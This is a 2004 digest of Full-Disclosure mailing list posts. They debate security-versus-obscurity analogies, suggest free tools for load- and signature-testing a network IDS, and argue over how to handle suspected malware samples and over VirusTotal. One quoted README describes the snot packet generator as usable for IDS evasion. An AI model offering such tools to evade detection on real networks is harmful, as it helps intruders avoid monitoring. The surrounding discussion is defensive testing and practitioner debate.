> Apologies, please explain the lack of differences, I'm not getting them. 
> 
> Virtual:
> "The door" - Port 80 - Closed after connection attempt. You come back,
> it does the same, and then closes again. 404 Error not being
> dissimilar to being told to get out.

His request was passed by the firewall.  It was the web server that
would not sell him a Big Mac because he did not have a shirt and shoes
on.
-- 
Chief Gadgeteer
Elegant Innovations



[Full-Disclosure] Re: Security & Obscurity: physical-world analogies

2004-09-03 Thread gadgeteer
On Thu, Sep 02, 2004 at 05:37:20PM -0500, Frank Knobbe ([EMAIL PROTECTED]) wrote:
> To really illustrate the point, let me make a more colorful example.
> People-packets in the real world can be stopped by a moat around the
> castle. The people-packet runs towards the castle and falls into the
> moat. People-packet has ceased to exist. In cyber space, the
> people-packet will again clone itself and run "purposefully" into the
> moat, piling up the "dead" people-packets until the moat is full. The
> remaining people-packets can then enter the castle.
> 
> Feel free to play through the same scenario with a wall where "dead"
> people-packets get purposefully deployed in front of the wall until the
> last people-packet can climb the packet mountain and pass over the wall.
 
Unfortunately, this tactic has been used in warfare.  It has been referred
to as the "human wave" attack. :-(
 
> The copy conundrum: You have a chair. Dave wants to steal your chair. If
> he does, you know your chair has been stolen. In cyber space, Dave can
> steal your chair by making a copy. You still have your chair and you do
> not know if it was stolen or not. Dave does have your chair now, but you
> don't know.
> 
> Leftovers: Let's say you burned said chair. Let's say Dave told you that
> he came to your house, made a copy of your chair, drove home and put the
> copy into his living room. In the real world you might go to Dave's
> house and remove/destroy your chair. In the IT world you will find that
> said chair is not only present in Dave's living room, but there is an
> inadvertent copy left in his car. Oh, and also on his hands, or any
> other place that the chair passed through.

This is a good example, and Dave's mention of the multi-packet attack is
another, of why there are large gaps created when relying too heavily on
analogies from one realm in another.

I understand your need for analogies to communicate ideas to a
non-technical audience.  Use analogies and case studies that do not
invoke such powerful emotions.  These simply cloud the issue and lead to
thinking errors.  Exploiting thinking errors is highly effective in both
the physical world and the binary world.

There are thought experiments that can lead to clear thinking about the
issues at hand.  For example, chapter 21 of Bruce Schneier's Secrets &
Lies where he describes "attack trees".  Ross Anderson uses the thought
experiment "how to steal a painting" in his analysis of threat models in
"Security Engineering: A Guide to Building Dependable Distributed
Systems".

No, CEOs et al do not have an hour to spend reading full-disclosure
everyday.  But in today's world it is imperative that they have someone
on staff who does.  And they listen to that person.  Equipped with good
thought tools to consider what this person says will enable them to make
the right decisions regarding the security and integrity of their
organization.
-- 
Chief Gadgeteer
Elegant Innovations



[Full-Disclosure] [RE: Test scripts for NIDS]

2004-09-03 Thread indianz
To test with stick and snot, you just throw alerts at the IDS; after
that, you should check the logs of the IDS to see what has been recorded
and what was dropped.
You can also throw (with stick and snot) and try to exploit the IDS from
another machine at the same time.

Have also a look at
http://packetstormsecurity.nl/distributed/stick.htm

Stick Download:
http://www.eurocompton.net/stick/projects8.html

Snot Download:
http://www.stolenshoes.net/sniph/index.html

IDSwakeup Download:
http://www.hsc.fr/ressources/outils/idswakeup/index.html.en

GreetZ from IndianZ

mailto:[EMAIL PROTECTED]
http://www.indianz.ch


> I've gotten alot of suggestions to test the
> signatures, i've got some to test the load but they
> were $$$, anything out there for free ?
>
> With a software and not an appliance how does one test
> the load to know when the IDS can no longer verify
> packets and they are being dropped ? Is this included
> in the software ?
>
> Thanks again everyone :)
>
>
>> > -Original Message-
>> > From: Bénoni MARTIN
>> [mailto:[EMAIL PROTECTED]
>> > Sent: August 31, 2004 09:05
>> > To: John Madden; [EMAIL PROTECTED]
>> > Subject: RE: Test scripts for NIDS
>> >
>> 
>> >
>> > I know there is a tool that generates Snort's
>> alerts, but I
>> > just cannot remeber it's name :(
>> >
>> The tool you're talking about is called "SNOT". You
>> can find it
>> here: http://www.stolenshoes.net/sniph/index.html
>>
>> From the file 'snot-0.92a-README.txt' post at that
>> URL:
>>
>> "Snot is an arbitrary packet generator, that uses
>> snort rules
>> files as its source of packet information. It
>> attempts at all
>> times to randomise information that is not contained
>> in the
>> rule, to hamper the generation of 'snot detection'
>> snort rules.
>>
>> It can be used as an IDS evasion tool, by using
>> specific decoy
>> hosts, or just something to keep your friendly IDS
>> monitoring
>> staff busy.
>>
>> It has been tested to run on *BSD, Linux, Win2k,
>> NT4.0 and Win98."
>>
>> I hope this helps,
>> Alex%



Re: [Full-Disclosure] Response to comments on Security and Obscurity

2004-09-03 Thread Über GuidoZ
Personally, I feel it's a VERY valid point. If the only way to fix
something, for example, is by training and education, it's entirely
possible the time (and resources) necessary to do such a thing isn't
there.

[EMAIL PROTECTED] said:
> If you do not have time, and the audience does not care
> enough to spend the time, then the battle is already lost.

I believe this is entirely two different things (you do not have the
time and the audience doesn't care), and usually they don't exist at
once in a given situation. (It's one or the other.) However, I will
agree that the battle will be lost if no one cares or tries to do
anything in a given situation.

James Tucker said:
> I apologise, but I have spent most of my life at this and I don't know
> everything, I doubt my audience would donate that much time, even
> if I gave it.

Agreed. I've been down the same path and have met with resistance when
I tried to provide the time and resources necessary to solve a given
problem. More often than not I find it's the "audience" that is
unwilling. They don't want to take the time to learn something new,
train their staff in something new, or provide the money to do all, or
any of, the above. Pity.

-- 
Peace. ~G


On Thu, 2 Sep 2004 22:42:27 +0100, James Tucker <[EMAIL PROTECTED]> wrote:
> On Thu, 2 Sep 2004 12:53:20 -0700 (PDT), Security List
> <[EMAIL PROTECTED]> wrote:
> > Mr. Tucker wrote:
> >
> > >Maybe, but you have to educate people somehow, and
> > you don't have time
> > >to explain everything.
> >
> > This is an excuse and the weak point.  If you do not
> > have time, and the audience does not care enough to
> > spend the time, then the battle is already lost.
> 
> I apologise, but I have spent most of my life at this and I don't know
> everything, I doubt my audience would donate that much time, even if I
> gave it. But thank you for your encouragement.



Re: [Full-Disclosure] win2kup2date.exe ?

2004-09-03 Thread Über GuidoZ
Hey, the man asked for help, so I offered it. Simple as that... I'm a
helpful guy, it's what makes me tick. Dedicated my life to a
non-profit organization that helps the average consumer FOR FREE with
security consulting, technical support, and personal privacy. Not
because I'm trying to collect anything. Not because I'm trying to get
a foothold on any business. Simply for the fact that I remember how
frustrated and helpless I was when I didn't understand anything. I try
to make sure others don't have to suffer the same fate.

Be cautious with your words. You never know who you may be speaking to,
or how they will take it. General advice; not necessarily relating to
this situation beyond common courtesy.

As for VirusTotal.com, to be honest I have never cared why they
provide the service they do. I also could care less if they are
keeping copies of the viruses that are sent to them... they are
available all over the Internet. (Google it...) When someone has an
unknown malware EXE and they need a quick way to identify it to fix a
problem, why not go with what works? Their business practices aren't
any business of mine. The fact that they answer the question I ask,
however, IS.

A little respect is all I ever ask. =)

-- 
Peace. ~G


On Fri, 03 Sep 2004 11:19:41 +1200, Nick FitzGerald
<[EMAIL PROTECTED]> wrote:
> Über GuidoZ wrote:
> 
> > ...  If you want to email me a copy of it, I'll
> > rip it apart and see what can be seen.
> 
> And world plus dog should entrust you with such material because???
> 
> > P.S. Send it to [...] - it's my "catch all" for
> > virus/unknown files. Just be sure to ZIP it up or else the web host
> > won't let it through. Otherwise I have disabled all checks/scan.
> > Downloads directly to a secured Linux box.
> 
> That's all very nice, but alone, far from the makings of someone to
> entrust arbitrary, suspected malware samples to.
> 
> I'm also rather suspicious of your promotion of Virus Total.  Hispasec,
> as far as I can tell (Spanish being something I have to have translated
> via online services), has no antivirus or similar product of its own,
> yet it has set up, and some folk seem to be promoting, what is
> effectively a sample collection mechanism.  I've also heard vague
> rumblings that Hispasec/Virus Total does not have suitable licenses for
> at least some of the scanners used in its service (and strongly suspect
> that several of the AV vendors whose products are currently used would
> not allow their products to be licensed for use in a service of the
> kind Virus Total offers anyway because it paints a rather disturbing
> trust picture -- "You can trust me because I can run a virus
> scanner...").
> 
> Regards,
> 
> Nick FitzGerald



Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)

2004-09-03 Thread Über GuidoZ
Awesome list of info there Nick. Thanks for putting it all into one place. =)

-- 
Peace. ~G


On Fri, 03 Sep 2004 11:19:41 +1200, Nick FitzGerald
<[EMAIL PROTECTED]> wrote:
> bashis wrote:
> 
> > Thx for the tip with VirusTotal guys! =)
> >
> > Here is the result.
> <>
> 
> OK -- having delayed it this far, have you considered sending a copy to
> the major AV vendors so they can add detection of it to their products
> (and, in the case of those that already detect it heuristically or
> generically, ensure that they don't "lose" detection of this possibly-
> unseen-by-them variant when their heuristic/generic detectors get
> revised/updated, as they are all the time)?
> 
> Here's a list of the sample submission address of the developers of the
> better known virus scanners:
> 
>Authentium (Command Antivirus)  <[EMAIL PROTECTED]>
>Computer Associates (US)<[EMAIL PROTECTED]>
>Computer Associates (Vet/EZ)<[EMAIL PROTECTED]>
>DialogueScience (Dr. Web)   <[EMAIL PROTECTED]>
>Eset (NOD32)<[EMAIL PROTECTED]>
>F-Secure Corp.  <[EMAIL PROTECTED]>
>Frisk Software (F-PROT) <[EMAIL PROTECTED]>
>Grisoft (AVG)   <[EMAIL PROTECTED]>
>H+BEDV (AntiVir, Vexira engine) <[EMAIL PROTECTED]>
>Kaspersky Labs  <[EMAIL PROTECTED]>
>Network Associates (McAfee) <[EMAIL PROTECTED]>
>  (use a ZIP file with the password 'infected' without the quotes)
>Norman (NVC)<[EMAIL PROTECTED]>
>Panda Software  <[EMAIL PROTECTED]>
>Sophos Plc. <[EMAIL PROTECTED]>
>Symantec (Norton)   <[EMAIL PROTECTED]>
>Trend Micro (PC-cillin) <[EMAIL PROTECTED]>
>  (Trend may only accept files from users of its products)
> 
> --
> Nick FitzGerald
> Computer Virus Consulting Ltd.
> Ph/FAX: +64 3 3529854



Re: [Full-Disclosure] Re: Microsoft Update Loader msrtwd.exe

2004-09-03 Thread Über GuidoZ
Easy sparky. Maybe it isn't his choice that he cannot release the EXE.
It's entirely possible, in fact, quite likely, that some "higher up"
who knows dick about IT and viruses got scared and said "This cannot
be shared with anyone! If it does, you'll lose your job". Just because
they are worried about their image or that the file might contain
sensitive data.

I have run into this situation MANY times. There is usually little you
can do about it as an IT staff member or a consultant. So the next
best thing - ask a group of people that might have a clue what's going
on, WITHOUT needing to see or analyze said file.

Sheesh, give the guy a break. The only pollution I've noticed lately
is rude comments.

-- 
Peace. ~G


On Thu, 2 Sep 2004 20:30:53 +0200 (CEST), Feher Tamas
<[EMAIL PROTECTED]> wrote:
> Hello,
> 
> >Recently discovered a trojan(? - possibly a virus) called
> >msrtwd.exe. It's listed in the Registry as "Microsoft Update
> >Loader" Does anyone know anything about this?
> >(Un)Fortunately, I am not allowed to distribue the exe.
> 
> When the f*ck will people finally realize that it is NOT possible to say
> anything about a file without actually having the file?
> 
> If you wanna know what the f*ck this or that file is, go to and feed that
> file here:
> http://www.kaspersky.com/scanforvirus
> 
> Less than 50 chars to remember and you can stop polluting this list.
> Wow!
> 
> Regards: Tamas Feher.



Re: [Full-Disclosure] Viral infection via Serial Cable

2004-09-03 Thread Über GuidoZ
I understand where you're coming from if speaking about protocol.
However, in most cases there will be many more ways to exploit
something over TCP/IP than over a raw RS232 connection. The serial
port will need to have something listening on it, that is also
exploitable. Compare this to the amount of exploitable services and
such listening on a TCP/IP connection over the network. Matter of
probability is what I was getting at... I apologize if I wasn't clear
on this point.

Accepting the fact that MANY viruses exist in the wild that are
designed to infect over TCP/IP, the chance of running into one that
infects over a serial port is little to none. (Granted, unless that
connection is being used as a network communication device, which then
in turn changes the entire argument back over to TCP/IP and network,
not RS232 data.) Interesting thoughts all, please keep them coming.

-- 
Peace. ~G


On Tue, 31 Aug 2004 02:49:41 +0200, Christian <[EMAIL PROTECTED]> wrote:
> Über GuidoZ wrote:
> > even though it's officially a serial connection... the assumtion is
> > talking about RS232 specs: http://www.google.com/search?q=rs232 I
> > think we're all aware a virus can most certainly traverse through a
> > USB connection.)
> >
> 
> hm, i fail to see the point here. isn't a serial connection to the
> outside world "just another link"? who cares, if it is a serial
> connection or ethernet? maybe i am biased with SLIP under linux - Serial
> Line IP, so the serial device really gets an ip-address and then it's
> tcp/ip all the way and no application/virus would care if this is
> "serial link". or is all data just sent to "com1"?
> 
> thanks,
> Christian.
> --
> BOFH excuse #416:
> 
> We're out of slots on the server



Re: [Full-Disclosure] win2kup2date.exe ?

2004-09-03 Thread Über GuidoZ
James Tucker said:
> There is always no need for aggressive statement of suspicion, which
> you are close to here. While I understand aggression due to anger, I
> am concerned that one should not get angry at someone offering them
> a service merely because one is suspicious of them. What if the offer
> of help is entirely genuine?

Amen. Not only that, but as was also said, the choice to do so or not is yours.

-- 
Peace. ~G


On Fri, 3 Sep 2004 02:19:07 +0100, James Tucker <[EMAIL PROTECTED]> wrote:
> On Fri, 03 Sep 2004 11:19:41 +1200, Nick FitzGerald
> <[EMAIL PROTECTED]> wrote:
> > Über GuidoZ wrote:
> >
> > > ...  If you want to email me a copy of it, I'll
> > > rip it apart and see what can be seen.
> >
> > And world plus dog should entrust you with such material because???
> ... most viruses, trojans and malware to not store copies of stolen
> data in their executables. Furthermore the file size is very small.
> 
> > > P.S. Send it to [...] - it's my "catch all" for
> > > virus/unknown files. Just be sure to ZIP it up or else the web host
> > > won't let it through. Otherwise I have disabled all checks/scan.
> > > Downloads directly to a secured Linux box.
> >
> > That's all very nice, but alone, far from the makings of someone to
> > entrust arbitrary, suspected malware samples to.
> 
> "Entrust", just what exactly are you thinking you might be giving away?
> 
> > I'm also rather suspicious of your promotion of Virus Total.  Hispasec,
> > as far as I can tell (Spanish being something I have to have translated
> > via online services), has no antivirus or similar product of its own,
> 
> I do not necessarily trust this company or their service. Having said
> that, if they produced their own Anti-Virus package, to put other
> vendors scanning engines in a publicly available service would either
> be damaging to their business, or considered anti-competitive.
> 
> > yet it has set up, and some folk seem to be promoting, what is
> > effectively a sample collection mechanism.  I've also heard vague
> > rumblings that Hispasec/Virus Total does not have suitable licenses for
> > at least some of the scanners used in its service (and strongly suspect
> > that several of the AV vendors whose products are currently used would
> > not allow their products to be licensed for use in a service of the
> > kind Virus Total offers anyway because it paints a rather disturbing
> > trust picture -- "You can trust me because I can run a virus
> > scanner...").
> 
> Again, you suspect allot of deception here, and while it is of course
> possible you are correct, I have yet to see this ever done in
> practice. Samples of non-data carrying viruses or trojans are of
> little use to anyone other than Anti-Virus firms, as it is easy to
> collect raw source for most if one is so inclined.
> I agree that it is unlikely they have sufficient client licenses to
> provide such a service; however I can see that there are a great deal
> of arguments in law about how their case may be won. They may for
> example only be required to carry one license, they could argue that
> they are simply allowing users to deliberately infect their systems,
> and making portions of the logs publicly available.
> 
> If there are viruses which commonly copy target system data, or
> sensitive data into their binaries at the present time (I imagine the
> mention of this deception may well spring at least one such virus)
> then I apologise that I am not aware of it. If the report of the virus
> name in question is accurate (which IIRC it has been now verified by
> someone else) then the binary is not carrying sensitive data.
> 
> Having said all of the above, your concern is not mis-placed, and if
> you feel uncomfortable with any such possibility of giving away a
> minor amount of data, then certainly make good your freedom and choose
> not to do so.
> 
> There is always no need for aggressive statement of suspicion, which
> you are close to here. While I understand aggression due to anger, I
> am concerned that one should not get angry at someone offering them a
> service merely because one is suspicious of them. What if the offer of
> help is entirely genuine?



Re: [Full-Disclosure] Security & Obscurity: First-time attacks and lawyer jokes

2004-09-03 Thread Honza Vlach
Georgi Guninski wrote:
| for the sake of the argument, let's assume there are as low as 10^6
bugs in m$
| warez. to take over the world (and in particular any target thereof) a kid
| needs as low as 10^2 or even 10 or even 1 exploits.
| any "real world" ('tm' of god) analogies?
|
Shooting a fish in a barrel?
Honza Vlach


Re: [Full-Disclosure] win2kup2date.exe ?

2004-09-03 Thread Über GuidoZ
Ahem, *blush*

> Be cautios with your words

Should be, as you probably guessed: "Be cautious with your words". Damn typos.

-- 
Peace. ~G


On Fri, 3 Sep 2004 01:58:24 -0400, Über GuidoZ <[EMAIL PROTECTED]> wrote:
> Hey, the man asked for help, so I offered it. Simple as that... I'm a
> helpful guy, it's what makes me tick. Dedicated my life to a
> non-profit organization that helps the average consumer FOR FREE with
> security consulting, technical support, and personal privacy. Not
> because I'm trying to collect anything. Not because I'm trying to get
> a foothold on any business. Simply for the fact that I remember how
> frustrated and helpless I was when I didn't understand anything. I try
> to make sure others don't have to suffer the same fate.
> 
> Be cautios with your words. You never know who you may be speaking to,
> or how they will take it. General advice; not necessarily relating to
> this situation beyond common courtesy.
> 
> As for VirusTotal.com, to be honest I have never cared why they
> provide the service they do. I also could care less if they are
> keeping copies of the viruses that are sent to them... they are
> available all over the Internet. (Google it...) When someone has an
> unknown malware EXE and they need a quick way to identify it to fix a
> problem, why not go with what works? Their business practices aren't
> any business of mine. The fact that they answer the question I ask,
> however, IS.
> 
> A little respect is all I ever ask. =)
> 
> --
> Peace. ~G
> 
> On Fri, 03 Sep 2004 11:19:41 +1200, Nick FitzGerald <[EMAIL PROTECTED]> wrote:
> > Über GuidoZ wrote:
> >
> > > ...  If you want to email me a copy of it, I'll
> > > rip it apart and see what can be seen.
> >
> > And world plus dog should entrust you with such material because???
> >
> > > P.S. Send it to [...] - it's my "catch all" for
> > > virus/unknown files. Just be sure to ZIP it up or else the web host
> > > won't let it through. Otherwise I have disabled all checks/scan.
> > > Downloads directly to a secured Linux box.
> >
> > That's all very nice, but alone, far from the makings of someone to
> > entrust arbitrary, suspected malware samples to.
> >
> > I'm also rather suspicious of your promotion of Virus Total.  Hispasec,
> > as far as I can tell (Spanish being something I have to have translated
> > via online services), has no antivirus or similar product of its own,
> > yet it has set up, and some folk seem to be promoting, what is
> > effectively a sample collection mechanism.  I've also heard vague
> > rumblings that Hispasec/Virus Total does not have suitable licenses for
> > at least some of the scanners used in its service (and strongly suspect
> > that several of the AV vendors whose products are currently used would
> > not allow their products to be licensed for use in a service of the
> > kind Virus Total offers anyway because it paints a rather disturbing
> > trust picture -- "You can trust me because I can run a virus
> > scanner...").
> >
> > Regards,
> >
> > Nick FitzGerald
